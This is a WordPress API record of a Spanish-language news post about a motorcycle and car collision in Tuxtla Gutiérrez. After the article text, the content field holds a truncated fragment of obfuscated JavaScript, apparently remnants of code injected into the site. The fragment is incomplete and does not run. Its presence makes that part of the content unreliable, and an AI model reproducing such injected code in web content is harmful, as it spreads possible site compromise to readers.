{"id":21056,"date":"2025-03-25T04:56:26","date_gmt":"2025-03-25T04:56:26","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21056"},"modified":"2025-03-25T04:58:30","modified_gmt":"2025-03-25T04:58:30","slug":"motociclista-y-particular-chocan-en-la-avenida-central","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21056","title":{"rendered":"Motociclista y particular chocan en la Avenida Central"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250324-WA0091-1024x768.jpg\" alt=\"\" class=\"wp-image-21057\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250324-WA0091-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250324-WA0091-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250324-WA0091-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250324-WA0091-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250324-WA0091.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 24 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Este lunes por la tarde noche un motociclista y el conductor de un Volkswagen Vento chocaron sobre la Avenida Central y 11 Oriente.<\/p>\n\n\n\n<p>De acuerdo con testigos del choque el coche circulaba de Poniente a Oriente sobre la Avenida central y la moto circulaba de Sur a Norte sobre la 11 Oriente.<\/p>\n\n\n\n<p>Uno de los dos se pas\u00f3 la luz verde y provoc\u00f3 el choque.<\/p>\n\n\n\n<p>Por el golpe el conductor de la moto qued\u00f3 tirado en el asfalto con golpes leves.<\/p>\n\n\n\n<p>Con la presencia de los oficiales de tr\u00e1nsito llegaron a un acuerdo econ\u00f3mico y se retiraron para despejar la v\u00eda.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 24 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Este lunes por la tarde noche un motociclista y el conductor de un Volkswagen Vento chocaron sobre la Avenida Central y 11 Oriente. De acuerdo con testigos del choque el coche circulaba de Poniente a Oriente sobre la Avenida central y la moto circulaba &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21057,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-21056","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21056","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21056"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21056\/revisions"}],"predecessor-version":[{"id":21058,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21056\/revisions\/21058"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21057"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21056"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21056"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21056"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}